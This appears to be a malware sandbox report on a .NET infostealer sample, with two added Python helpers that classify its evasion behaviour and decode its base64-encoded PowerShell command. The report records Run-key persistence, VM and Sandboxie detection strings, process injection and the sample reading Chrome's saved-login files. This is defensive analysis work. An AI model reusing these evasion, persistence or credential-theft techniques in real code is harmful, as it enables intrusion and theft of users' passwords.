Source: Yara match File source: 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.590549636.0000000003428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.539813510.000000000448F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pdf.exe PID: 3712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pdf.exe PID: 3536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fireless.exe PID: 1420, type: MEMORYSTR
Source: BPL_1000572_007.bat.exe, u0003.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Wthdlxoyqvnqsfcfiinf.exe.0.dr, yjyog.cs .Net Code: idenr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: pdf.exe.0.dr, u0003.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.BPL_1000572_007.bat.exe.5b0000.0.unpack, u0003.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.Wthdlxoyqvnqsfcfiinf.exe.6d0000.0.unpack, yjyog.cs .Net Code: idenr System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: fireless.exe.13.dr, u0003.cs .Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02752318 pushfd ; iretd 0_2_027527D5
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02752020 push esp; iretd 0_2_0275230D
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_02752304 push esp; iretd 0_2_0275230D
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Code function: 0_2_027527BA pushfd ; iretd 0_2_027527D5
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Code function: 17_2_0301EEC1 push FFFFFF8Bh; iretd 17_2_0301EEC3
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Roaming\note\pdf.exe
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe

Boot Survival

Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pdf
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce quislingistic
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (20 identical events)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Process information set: NOOPENFILEERRORBOX (31 identical events)

Malware Analysis System Evasion

Source: BPL_1000572_007.bat.exe, 00000000.00000002.448721724.000000000298E000.00000004.00000800.00020000.00000000.sdmp, BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: BPL_1000572_007.bat.exe, 00000000.00000002.460105913.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.598968323.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592125246.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592176698.00000000032FD000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000011.00000002.592077345.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.598264553.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.590614103.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591295608.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000014.00000002.591358526.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.597986476.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLLJ(REMOTETHREADSUSPENDED) [-] NTPROTECTVIRTUALMEMORY, PAGE_EXECUTE_READ: {0}ESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USER SHELL FOLDERS/(REMOTETHREADSUSPENDED) [-] NTRESUMETHREAD: {0}
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 868 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 3028 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9552
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: Amcache.hve.21.dr Binary or memory string: VMware
Source: BPL_1000572_007.bat.exe, 00000000.00000002.444162317.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: Amcache.hve.21.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.21.dr Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.21.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.21.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: fireless.exe, 00000016.00000002.591087529.000000000345D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen"select * from Win32_ComputerSystem
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.21.dr Binary or memory string: VMware7,1
Source: Amcache.hve.21.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: BPL_1000572_007.bat.exe, 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: vmtools
Source: Amcache.hve.21.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.21.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: fireless.exe, 00000016.00000002.591002736.0000000003454000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: Amcache.hve.21.dr Binary or memory string: VMware, Inc.me
Source: Amcache.hve.21.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.21.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.21.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process queried: DebugPort (2 identical events)
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Memory allocated: page read and write | page guard
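The evasion records above are easier to reason about once they are bucketed by technique. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses a constructed copy of a few of the "Source:" lines from this section (memory-dump identifiers shortened), classifies them (Sandboxie DLL string, hypervisor-fingerprinting WMI classes, hypervisor-name regexes, long sleeps, ProcessDebugPort queries, SeDebugPrivilege), and replays the sample's own regex strings against the analysis VM's identity taken from the Amcache strings above (SystemManufacturer VMware, Inc., SystemProduct VMware7,1). Three things are assumptions rather than facts from the report: the sleep values are treated as milliseconds (the report labels them "s", but 30000 is the usual 30 s threshold and 922337203685477 is exactly TimeSpan.MaxValue in ms), the 3-minute long-sleep threshold is taken from the signature list, and the regexes are applied case-insensitively to the Manufacturer and Model fields of Win32_ComputerSystem, the query they sit next to in memory.

```python
import re

# Constructed sample input: "Source:" lines copied from the Malware Analysis
# System Evasion section of this report (long memory-dump identifiers
# shortened). Pasted text, not live sandbox output.
REPORT_LINES = [
    r"Source: BPL_1000572_007.bat.exe, 00000000.00000002.448721724.sdmp Binary or memory string: SBIEDLL.DLL",
    r"Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk",
    r"Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 868 Thread sleep time: -30000s >= -30000s",
    r"Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe TID: 3028 Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem",
    r"Source: fireless.exe, 00000016.00000002.591087529.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen",
    r"Source: fireless.exe, 00000016.00000002.591002736.sdmp Binary or memory string: Microsoft|VMWare|Virtual",
    r"Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process token adjusted: Debug",
]

LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s+"
    r"(?P<event>Binary or memory string|WMI Queries|Thread sleep time|"
    r"Process queried|Process token adjusted):\s*(?P<detail>.*)$"
)

# Sandboxie injects this DLL into every sandboxed process; its name in a
# string table is the classic "am I in Sandboxie" check.
SANDBOX_DLLS = {"sbiedll.dll"}

# WMI classes the sample enumerates to fingerprint hypervisor hardware.
WMI_HW_CLASSES = {"Win32_ComputerSystem", "Win32_Processor", "Win32_LogicalDisk"}

# Assumption: sleep values are milliseconds. 922337203685477 is
# TimeSpan.MaxValue (2**63-1 ticks of 100 ns) expressed in ms.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477
LONG_SLEEP_MS = 3 * 60 * 1000                     # "long sleeps (>= 3 min)"

# Regex strings recovered from fireless.exe memory, found next to
# "select * from Win32_ComputerSystem". Case-insensitive matching is an
# assumption; the report does not show the RegexOptions used.
VM_REGEXES = (
    re.compile(r"VMware|VIRTUAL|A M I|Xen", re.I),
    re.compile(r"Microsoft|VMWare|Virtual", re.I),
)


def sleep_ms(detail):
    """First number in '-922337203685477s >= -30000s' (negative = relative time)."""
    m = re.match(r"\s*-?(\d+)", detail)
    return int(m.group(1)) if m else None


def describe_sleep(ms):
    if ms >= TIMESPAN_MAX_MS:
        return "TimeSpan.MaxValue, effectively unbounded"
    return f"{ms / 1000:.0f} s"


def classify(lines):
    """Bucket report lines by evasion technique."""
    hits = {k: [] for k in ("sandbox_dll", "wmi_hw_query", "vm_vendor_regex",
                            "long_sleep", "anti_debug", "debug_privilege")}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        source, event, detail = m.group("source"), m.group("event"), m.group("detail").strip()
        if event == "Binary or memory string":
            if detail.lower() in SANDBOX_DLLS:
                hits["sandbox_dll"].append(detail)
            elif "|" in detail and re.search(r"vm|virtual|xen", detail, re.I):
                hits["vm_vendor_regex"].append(detail)   # alternation of hypervisor names
        elif event == "WMI Queries":
            cls = re.search(r"\bfrom\s+(Win32_\w+)", detail, re.I)
            if cls and cls.group(1) in WMI_HW_CLASSES:
                hits["wmi_hw_query"].append(cls.group(1))
        elif event == "Thread sleep time":
            ms = sleep_ms(detail)
            if ms is not None and ms >= LONG_SLEEP_MS:
                hits["long_sleep"].append(ms)
        elif event == "Process queried" and detail == "DebugPort":
            hits["anti_debug"].append(source)            # NtQueryInformationProcess(ProcessDebugPort)
        elif event == "Process token adjusted" and detail == "Debug":
            hits["debug_privilege"].append(source)       # SeDebugPrivilege enabled
    return hits


def malware_vm_regexes_fire(manufacturer, model):
    """Would the sample's own regexes flag this Win32_ComputerSystem record?"""
    return any(rx.search(f"{manufacturer} {model}") for rx in VM_REGEXES)


if __name__ == "__main__":
    hits = classify(REPORT_LINES)
    for technique, items in hits.items():
        print(f"{technique:16} {items}")
    for ms in hits["long_sleep"]:
        print("long sleep:", describe_sleep(ms))
    # Identity of the analysis VM, from the Amcache.hve strings in the report.
    print("analysis VM matches sample regex:", malware_vm_regexes_fire("VMware, Inc.", "VMware7,1"))
    # Constructed bare-metal identity for contrast.
    print("physical host matches sample regex:", malware_vm_regexes_fire("Example Corp.", "Workstation 1"))
```

The last two lines are the practical point: with the VM reporting VMware, Inc. / VMware7,1 through Win32_ComputerSystem, the sample's regexes match, so a sandbox that wants the full payload to execute has to present non-hypervisor manufacturer and model strings (and hide SbieDll.dll) rather than only shortening sleeps.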

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: Base64 decoded Start-Sleep -Seconds 50 (2 identical events)
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Memory written: C:\Users\user\Desktop\BPL_1000572_007.bat.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe "C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe"
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Process created: C:\Users\user\Desktop\BPL_1000572_007.bat.exe C:\Users\user\Desktop\BPL_1000572_007.bat.exe
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 1352
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\Users\user\Desktop\BPL_1000572_007.bat.exe VolumeInformation
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 identical events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 identical events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 identical events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 identical events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 identical events)
Source: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Wthdlxoyqvnqsfcfiinf.exe VolumeInformation
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\note\pdf.exe Queries volume information: C:\Users\user\AppData\Roaming\note\pdf.exe VolumeInformation (2 identical events)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fireless.exe VolumeInformation
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.21.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
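The powershell.exe command line recorded in this section carries its script in -enc form, which is base64 over UTF-16LE rather than UTF-8; the sandbox already shows the decoded result (Start-Sleep -Seconds 50), but an analyst re-deriving it by hand often gets "S\x00t\x00a\x00..." by decoding as UTF-8. The Python below is an added example, not code from the report or from the sample: it extracts and decodes the encoded argument from the command line above, shows the inverse encoding so the recorded blob can be reproduced exactly, and reports whether the decoded script is only a delay. The benign command line used for contrast and its script path are constructed for this example, and the set of accepted flag spellings (-e, -ec, -en, -enc, -EncodedCommand) is a list of commonly seen forms, not an exhaustive description of powershell.exe's prefix matching.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample: the powershell.exe command line recorded in the section
# above (copied from the report), plus a benign one for contrast whose script
# path is made up for this example.
ENCODED_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA=="
)
PLAIN_CMDLINE = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\Scripts\backup.ps1'

# powershell.exe resolves any unambiguous prefix of -EncodedCommand; these are
# the spellings commonly seen in telemetry (assumption: not exhaustive).
ENC_FLAG_RE = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Start-Sleep with -Seconds, a prefix such as -s, or the positional form.
SLEEP_RE = re.compile(r"\bStart-Sleep\s+(?:-s\w*\s+)?(\d+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if absent or malformed."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None
    # The blob is base64 over UTF-16LE, not UTF-8. An odd byte count can
    # therefore never be a valid encoded command.
    if len(raw) % 2:
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def encode_command(script: str) -> str:
    """The inverse: what an operator runs to build the -enc argument."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def sleep_seconds(script: str) -> Optional[int]:
    """Seconds requested by a Start-Sleep in the decoded script, else None."""
    m = SLEEP_RE.search(script)
    return int(m.group(1)) if m else None


def triage(cmdline: str) -> str:
    """One-line verdict for a powershell.exe command line."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return "no encoded command"
    secs = sleep_seconds(script)
    if secs is not None and script.strip().lower().startswith("start-sleep"):
        return f"encoded command is a {secs}s delay only"
    return f"encoded command: {script!r}"


if __name__ == "__main__":
    for cmd in (ENCODED_CMDLINE, PLAIN_CMDLINE):
        print(triage(cmd))
    # Round trip: re-encoding the decoded script reproduces the recorded blob.
    print(encode_command("Start-Sleep -Seconds 50"))
```

Here the encoded script is nothing but a 50-second delay spawned by the parent, which fits the "Contains long sleeps" and "Encrypted powershell cmdline option found" signatures: the obfuscation hides a stall, not a downloader. The memory-write record in this section (an MZ header written at base 0x400000 into a second BPL_1000572_007.bat.exe instance) is consistent with the PE injection the signature list refers to, and is the event worth pivoting on rather than the PowerShell child.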

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.BPL_1000572_007.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a05df0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.39dddd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.3a55e10.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.435627430.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.476692694.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.478754600.0000000003A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.477582382.00000000039C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.452043304.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 5820, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BPL_1000572_007.bat.exe PID: 1952, type: MEMORYSTR
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\BPL_1000572_007.bat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: Yara match File source: 0.2.BPL_1000572_007.bat.exe.2a9d9dc.0.raw.unpack, type: UNPACKEDPE
